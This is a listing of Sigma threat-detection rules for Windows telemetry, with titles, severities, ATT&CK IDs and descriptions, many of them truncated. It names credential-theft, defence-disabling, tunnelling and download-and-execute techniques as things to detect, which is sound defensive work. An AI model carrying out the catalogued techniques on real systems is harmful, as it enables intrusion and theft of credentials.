Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed
T1685
imRegistry
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious
RestrictedAdminMode Registry Value Tampering
sigma high
T1112
imRegistry
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote
Sdiagnhost Calling Suspicious Child Process
sigma high
T1036T1218
imProcessCreate
Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
imRegistry
Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
T1685
imRegistry
Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
T1218.011
imProcessCreate
Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One tr
COM Object Execution via Xwizard.EXE
sigma medium
T1218
imProcessCreate
Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. This utility can be abused in order to run custom COM object created in the registry.
imProcessCreate
Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. Attackers could instantiate an instance of "wusa.exe" in
Potential Persistence Via Outlook Home Page
sigma high
T1112
imRegistry
Detects potential persistence activity via outlook home page. An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
Potential Persistence Via Outlook Today Page
sigma high
T1112
imRegistry
Detects potential persistence activity via outlook today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
T1003
imFileEvent
Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.
T1552.006
imFileEvent
Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
T1555.004
imFileEvent
Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" fun
T1555.004
imFileEvent
Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::m
Credential Manager Access By Uncommon Applications
sigma medium
T1003
imFileEvent
Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi
Process Launched Without Image Name
sigma medium
imProcessCreate
Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
T1528
imFileEvent
Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
Potential DLL Sideloading Of DbgModel.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "DbgModel.dll"
Anydesk Temporary Artefact
sigma medium
T1219.002
imFileEvent
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
T1218
imNetworkSession
Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually i
T1102T1102.001
imNetworkSession
Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
T1564T1059
imProcessCreate
Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
T1036
imProcessCreate
Detects a potentially suspicious execution from an uncommon folder.
Suspicious Electron Application Child Processes
sigma medium
imProcessCreate
Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execu
BitLockerTogo.EXE Execution
sigma low
T1218
imProcessCreate
Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard
T1556
imRegistry
Detects changes to "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a
Potential DLL Sideloading Of MpSvc.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "MpSvc.dll".
PDF File Created By RegEdit.EXE
sigma high
imFileEvent
Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensit
T1685
imRegistry
Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
T1562.001
imRegistry
Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker t
Periodic Backup For System Registry Hives Enabled
sigma medium
T1113
imRegistry
Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows create
HackTool - CrackMapExec File Indicators
sigma high
T1003.001
imFileEvent
Detects file creation events with filename patterns used by CrackMapExec.
HackTool - Inveigh Execution Artefacts
sigma critical
T1219.002
imFileEvent
Detects the presence and execution of Inveigh via dropped artefacts
HackTool - Mimikatz Kirbi File Creation
sigma critical
T1558
imFileEvent
Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
HackTool - NPPSpy Hacktool Usage
sigma high
imFileEvent
Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
sigma high
T1003
imFileEvent
Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
HackTool - Powerup Write Hijack DLL
sigma high
T1574.001
imFileEvent
Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies o
HackTool - QuarksPwDump Dump File
sigma critical
T1003.002
imFileEvent
Detects a dump file written by QuarksPwDump password dumper
T1219.002
imFileEvent
Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
HackTool - SafetyKatz Dump Indicator
sigma high
T1003.001
imFileEvent
Detects default lsass dump filename generated by SafetyKatz.
T1552.001
imFileEvent
Detects files written by the different tools that exploit HiveNightmare
Uncommon Link.EXE Parent Process
sigma medium
T1218
imProcessCreate
Detects an uncommon parent process of "LINK.EXE". Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation. Multiple utilities often found in the same fo
T1555T1552.004
imFileEvent
Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
DSInternals Suspicious PowerShell Cmdlets
sigma high
T1059.001
imProcessCreate
Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DI
Uncommon Child Process Of Setres.EXE
sigma high
T1218T1202
imProcessCreate
Detects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any ar
Files With System DLL Name In Unsuspected Locations
sigma medium
T1036.005
imFileEvent
Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to
T1572T1090T1102
imNetworkSession
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have
T1572T1090T1102
imNetworkSession
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have
Potentially Suspicious Usage Of Qemu
sigma medium
T1090T1572
imProcessCreate
Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersk
T1113
imRegistry
Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Wind
Windows Recall Feature Enabled - Registry
sigma medium
T1113
imRegistry
Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recal
T1105
imNetworkSession
Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
Network Communication Initiated To Portmap.IO Domain
sigma medium
T1041T1090.002
imNetworkSession
Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
Network Connection Initiated By Eqnedt32.EXE
sigma high
T1203
imNetworkSession
Detects network connections from the Equation Editor process "eqnedt32.exe".
Network Connection Initiated To Mega.nz
sigma low
T1567.002
imNetworkSession
Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
T1218.003
imNetworkSession
Detects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
T1105
imNetworkSession
Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
T1567T1572
imNetworkSession
Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
imFileEvent
Detects the creation of files with scripting or executable extensions by Mysql daemon. Which could be an indicator of "User Defined Functions" abuse to download malware.
imProcessCreate
Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
T1571
imNetworkSession
Detects programs that connect to known malware callback ports based on threat intelligence reports.
UAC Disabled
sigma medium
T1548.002
imRegistry
Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
UAC Notification Disabled
sigma medium
T1548.002
imRegistry
Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthoriz
UAC Secure Desktop Prompt Disabled
sigma medium
T1548.002
imRegistry
Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whe
Potentially Suspicious Execution Of PDQDeployRunner
sigma medium
imProcessCreate
Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
T1071.001
imNetworkSession
Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Win
PUA - SoftPerfect Netscan Execution
sigma medium
T1046
imProcessCreate
Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
T1218.009
imNetworkSession
Detects "RegAsm.exe" initiating a network connection to public IP adresses
T1218T1027.004
imProcessCreate
Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting.
Uncommon Child Process Of Defaultpack.EXE
sigma medium
T1218
imProcessCreate
Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
Pnscan Binary Data Transmission Activity
sigma medium
T1046
imProcessCreate
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker
Invoke-Obfuscation STDIN+ Launcher
sigma high
T1027T1059.001
imProcessCreate
Detects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher
sigma high
T1027T1059.001
imProcessCreate
Detects Obfuscated use of Environment Variables to execute PowerShell
Malware User Agent
sigma high
T1071.001
imWebSession
Detects suspicious user agent strings used by malware in proxy logs
ServiceDll Hijack
sigma medium
T1543.003
imRegistry
Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.
Displaying Hidden Files Feature Disabled
sigma medium
T1564.001
imRegistry
Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families
EVTX Created In Uncommon Location
sigma medium
T1562.002
imFileEvent
Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or si
T1547.003
imRegistry
Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system
Register New IFiltre For Persistence
sigma medium
imRegistry
Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Sear
Add Port Monitor Persistence in Registry
sigma medium
T1547.010
imRegistry
Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to
T1685.001
imRegistry
Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
T1547.010
imRegistry
Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interf
Disable Administrative Share Creation at Startup
sigma medium
T1070.005
imRegistry
Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
Disable Microsoft Defender Firewall via Registry
sigma medium
T1686.003
imRegistry
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
Disable Windows Event Logging Via Registry
sigma high
T1685.001
imRegistry
Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
New PortProxy Registry Entry Added
sigma medium
T1090
imRegistry
Detects the modification of the PortProxy registry key which is used for port forwarding.
T1021.002T1543.003T1569.002
imRegistry
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
Run Once Task Configuration in Registry
sigma medium
T1112
imRegistry
Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
Sysmon Driver Altitude Change
sigma high
T1685
imRegistry
Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
Windows Defender Service Disabled - Registry
sigma high
T1685
imRegistry
Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
T1016
imNetworkSession
Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
MaxMpxCt Registry Value Changed
sigma low
T1070.005
imRegistry
Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) con
Office Macros Warning Disabled
sigma high
T1112
imRegistry
Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
T1053.005
imProcessCreate
Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
Uncommon Outbound Kerberos Connection
sigma medium
T1558T1550.003
imNetworkSession
Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
T1574.011
imProcessCreate
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally speci
T1105
imNetworkSession
Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
T1588.002
imProcessCreate
Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
Potential Regsvr32 Commandline Flag Anomaly
sigma medium
T1218.010
imProcessCreate
Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
Replace.exe Usage
sigma medium
T1105
imProcessCreate
Detects the use of Replace.exe which can be used to replace file with another file
Sysmon Configuration Update
sigma medium
T1685
imProcessCreate
Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
Uninstall Sysinternals Sysmon
sigma high
T1685
imProcessCreate
Detects the removal of Sysmon, which could be a potential attempt at defense evasion
Communication To Uncommon Destination Ports
sigma medium
T1571
imNetworkSession
Detects programs that connect to uncommon destination ports
Microsoft Sync Center Suspicious Network Connections
sigma medium
T1055T1218
imNetworkSession
Detects suspicious connections from Microsoft Sync Center to non-private IPs.
Microsoft VBA For Outlook Addin Loaded Via Outlook
sigma medium
T1204.002
DeviceImageLoadEvents
Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
T1218.011
imNetworkSession
Detects a "winlogon.exe" process that initiate network communications with public IP addresses
T1571
imNetworkSession
Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
RDP Over Reverse SSH Tunnel
sigma high
T1572T1021.001
imNetworkSession
Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
Failed Logon From Public IP
sigma medium
T1078T1190T1133
imAuthentication
Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
T1133
imProcessCreate
Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incom
T1133
imProcessCreate
Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incom
imRegistry
Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
Console CodePage Lookup Via CHCP
sigma medium
T1614.001
imProcessCreate
Detects use of chcp to look up the system locale value as part of host discovery
Curl Download And Execute Combination
sigma high
T1218T1105
imProcessCreate
Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
Port Forwarding Activity Via SSH.EXE
sigma medium
T1572T1021.001T1021.004
imProcessCreate
Detects port forwarding activity via SSH.exe
T1587.001
imProcessCreate
Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges
PsExec/PAExec Escalation to LOCAL SYSTEM
sigma high
T1587.001
imProcessCreate
Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
Suspicious Ping/Del Command Combination
sigma high
T1070.004
imProcessCreate
Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial in
T1219.002
imProcessCreate
Detects potentially suspicious child processes launched via the ScreenConnect client service.
T1133
imProcessCreate
Detects ScreenConnect program starts that establish a remote access to a system.
T1190
imProcessCreate
Detects potential web shell execution from the ScreenConnect server process.
imProcessCreate
Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
Remote Access Tool - Simple Help Execution
sigma medium
T1219.002
imProcessCreate
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
User Added To Highly Privileged Group
sigma high
T1098
imProcessCreate
Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
Weak or Abused Passwords In CLI
sigma medium
imProcessCreate
Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline
APT User Agent
sigma high
T1071.001
imWebSession
Detects suspicious user agent strings used in APT malware in proxy logs
HackTool - BabyShark Agent Default URL Pattern
sigma critical
T1071.001
imWebSession
Detects Baby Shark C2 Framework default communication patterns
PUA - Advanced IP/Port Scanner Update Check
sigma medium
T1590
imWebSession
Detect the update check performed by Advanced IP/Port Scanner utilities.
T1021.001
imNetworkSession
Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling tha
Potential Fake Instance Of Hxtsr.EXE Executed
sigma medium
T1036
imProcessCreate
HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Fi
imProcessCreate
Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rul
T1218
imFileEvent
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Att
T1567T1568.002T1572T1090T1102
imNetworkSession
Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communicatio
Network Connection Initiated Via Notepad.EXE
sigma high
T1055
imNetworkSession
Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network co
Bypass UAC Using SilentCleanup Task
sigma high
T1548.002
imRegistry
Detects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup t
HackTool - SOAPHound Execution
sigma high
T1087
imProcessCreate
Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
Uncommon Connection to Active Directory Web Services
sigma medium
T1087
imNetworkSession
Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
Prefetch File Deleted
sigma high
T1070.004
imFileEvent
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
T1496
imNetworkSession
Detects initiated network connections to crypto mining pools
New Process Created Via Taskmgr.EXE
sigma low
T1036
imProcessCreate
Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
T1490
imProcessCreate
Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
Shell Process Spawned by Java.EXE
sigma medium
imProcessCreate
Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
Suspicious Processes Spawned by Java.EXE
sigma high
imProcessCreate
Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
Write Protect For Storage Disabled
sigma medium
T1685
imProcessCreate
Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed techniq
Hacktool Execution - PE Metadata
sigma high
T1588.002T1003
imProcessCreate
Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
imRegistry
Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for
Forfiles.EXE Child Process Masquerading
sigma high
T1036
imProcessCreate
Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
Screen Capture Activity Via Psr.EXE
sigma medium
T1113
imProcessCreate
Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
Cscript/Wscript Potentially Suspicious Child Process
sigma medium
imProcessCreate
Adversaries may
Powershell Defender Disable Scan Feature
sigma high
T1685
imProcessCreate
Detects requests to disable Microsoft Defender features using PowerShell commands
Suspicious Greedy Compression Using Rar.EXE
sigma high
T1059
imProcessCreate
Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
T1546.011
imRegistry
Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
Suspicious Redirection to Local Admin Share
sigma high
T1048
imProcessCreate
Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
Enable LM Hash Storage - ProcCreation
sigma high
T1112
imProcessCreate
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of you
Cloudflared Tunnel Connections Cleanup
sigma medium
T1102T1090T1572
imProcessCreate
Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
Cloudflared Portable Execution
sigma medium
T1090.001
imProcessCreate
Detects the execution of the "cloudflared" binary from a non standard location.
Cloudflared Quick Tunnel Execution
sigma medium
T1090.001
imProcessCreate
Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain o
Cloudflared Tunnel Execution
sigma medium
T1102T1090T1572
imProcessCreate
Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
Renamed Cloudflared.EXE Execution
sigma high
T1090.001
imProcessCreate
Detects the execution of a renamed "cloudflared" binary.
T1528
imProcessCreate
Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive infor
Disabled Volume Snapshots
sigma high
T1685
imProcessCreate
Detects commands that temporarily turn off Volume Snapshots
Enable LM Hash Storage
sigma high
T1112
imRegistry
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of you
Suspicious Wordpad Outbound Connections
sigma medium
imNetworkSession
The hypothesis detects potential
Potential PowerShell Execution Policy Tampering
sigma medium
imRegistry
Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
T1587.001
imFileEvent
Detects the creation of a file with an uncommon extension in an Office application startup folder
Registry Persistence via Explorer Run Key
sigma high
T1547.001
imRegistry
Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
Suspicious Executable File Creation
sigma high
T1564
imFileEvent
Detect creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
imFileEvent
Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
imProcessCreate
Detects process execution from a fake recycle bin folder, often used to avoid security solution.
Tap Installer Execution
sigma medium
T1048
imProcessCreate
Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
New Custom Shim Database Created
sigma medium
T1547.009
imFileEvent
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework
Suspicious Shim Database Patching Activity
sigma high
T1546.011
imRegistry
Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
Unusual Parent Process For Cmd.EXE
sigma medium
T1059
imProcessCreate
Detects suspicious parent process for cmd.exe
HackTool - WinPwn Execution
sigma high
T1046T1082T1106T1518T1548.002T1552.001T1555T1555.003
imProcessCreate
Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
T1055.009
imProcessCreate
Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
imProcessCreate
Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
T1176.001
imProcessCreate
Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
Load Of RstrtMgr.DLL By A Suspicious Process
sigma high
T1486T1562.001
DeviceImageLoadEvents
Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them
T1546.007
imRegistry
Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious N
T1176.001
imProcessCreate
Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
Enabling COR Profiler Environment Variables
sigma medium
T1574.012
imRegistry
Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
Execution of Suspicious File Type Extension
sigma medium
imProcessCreate
Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox method
T1685
imRegistry
Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing th
T1685
imRegistry
Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing th
Network Connection Initiated To DevTunnels Domain
sigma medium
T1567.001T1572
imNetworkSession
Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
T1567T1572
imNetworkSession
Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Uncommon Userinit Child Process
sigma high
T1037.001
imProcessCreate
Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
Windows Defender Exclusion List Modified
sigma medium
T1562.001
imRegistry
Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to b
Suspicious WmiPrvSE Child Process
sigma high
T1047T1204.002T1218.010
imProcessCreate
Detects suspicious and uncommon child processes of WmiPrvSE
Arbitrary File Download Via Squirrel.EXE
sigma medium
T1218
imProcessCreate
Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
Execute Code with Pester.bat
sigma medium
T1059.001T1216
imProcessCreate
Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
Msxsl.EXE Execution
sigma medium
T1220
imProcessCreate
Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data withi
Network Connection Initiated By IMEWDBLD.EXE
sigma high
T1105
imNetworkSession
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
T1218
imProcessCreate
Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\
Remote XSL Execution Via Msxsl.EXE
sigma high
T1220
imProcessCreate
Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
Suspicious Calculator Usage
sigma high
T1036
imProcessCreate
Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
Uncommon Child Process Of Appvlp.EXE
sigma medium
T1218
imProcessCreate
